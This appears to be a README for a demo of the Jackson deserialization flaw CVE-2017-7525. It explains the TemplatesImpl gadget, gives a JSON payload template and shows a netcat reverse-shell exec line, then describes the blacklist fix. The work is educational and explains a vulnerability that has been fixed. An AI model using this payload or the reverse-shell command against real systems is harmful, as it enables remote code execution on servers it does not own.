### CVE-2017-7525 vulnerability
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, 
which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.

Jackson is a tool that is used to automatically convert objects into JSON and JSON back into objects. An example JSON payload:
```
{
  "name" : "Bob", "age" : 13,
  "other" : {
      "type" : "student"
  }
}
```

Because `other` is of type `Object` we could create any arbitrary object that we want. For example we could create an object that we could use
to execute arbitrary code. The ability to create arbitrary objects comes with some limitations; Jackson requires a default constructor (no arguments).
So classes like ProcessBuilder that don't have a default constructor cannot be used.

The Jackson project gives a nice starting point for building an exploit (https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1):

```
{'id': 124,
  'obj':[ 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',
  {
    'transletBytecodes' : [ 'AAIAZQ==' ],
    'transletName' : 'a.b',
    'outputProperties' : { }
  }
  ]
}
```

The above code uses a well-known 'gadget'. It will accept and compile a Java object (via transletBytecodes) and execute it as soon as 
getOutputProperties method is called by reflection during deserialization to read the outputProperties property as can be seen in the stack trace.
So we just have to put the right payload into the transletBytecodes.

![img.png](img.png)

Here is the complete callstack up to the actual exploit code.

![img_1.png](img_1.png)

In the nl.jjpieters package is the Exploit java file. It contains a line like:
`Process process = Runtime.getRuntime().exec("ping 127.0.0.1");`
Inside the exec we could run any command that we want and we could go as far as to get access to a remote system by launching a reverse shell like this:
`Process process = Runtime.getRuntime().exec("/usr/bin/nc -e /bin/bash 127.0.0.1 443");`

The Exploit java file has to be compiled first and then it has to be base64 encoded before we can use it in the transletBytecodes field. 
As soon as the document is processed, it will create the object, load the code, and then execute it.

For convenience I have create a test file that will automatically encode the class file, base64 encode it and put it in the payload. 
Then it automatically sends the payload as well, making the application run whatever command is put inside the exec method.

### Vulnerability solution
This vulnerability has been fixed by implementing a blacklist, it contains class names that jackson won't deserialize. The blacklist can be found here:
https://github.com/FasterXML/jackson-databind/blob/master/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java

Just make sure to use any version of the jackson-databind library, from or above version 2.8.9.

### More info
Used sources:
- https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
- https://github.com/lampska/jacksondemo

More info about CVE-2017-7525:
- https://nvd.nist.gov/vuln/detail/CVE-2017-7525
